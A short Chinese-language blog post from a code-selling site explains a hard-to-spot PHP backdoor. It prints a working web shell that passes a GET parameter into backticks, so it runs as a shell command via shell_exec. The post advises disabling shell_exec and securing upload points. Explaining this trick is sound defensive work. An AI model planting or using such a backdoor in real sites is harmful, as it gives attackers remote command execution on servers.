最新公告
  • 欢迎访问代码工坊,购买产品可享受在线工单服务!
  • 一个不易发现的php后门写法 - 可引起执行任意函数

      直接上代码,我们直接看一下代码:

    $daimagongfang = $_GET['d'];
    if (isset($daimagongfang)){
        echo `$daimagongfang`;
    }

      初看下来觉得没什么,不就是个打印字符串吗,只不过输出时变量加了单引号,如何也想不到上升到了,代码工坊小编起初也这么觉得。

          其实不然,这里不是简单的英文单引号,它是一个反单引号,实际是函数的简略写法,会引起函数执行。

          而这里主要使用到的是函数shell_exec,所以该函数大家一定要及时禁用,防护好各处的上传入口。

          下面我们再来放大看一下两个字符的不同。

    单引号 → '
    反单引号→ `

    发表评论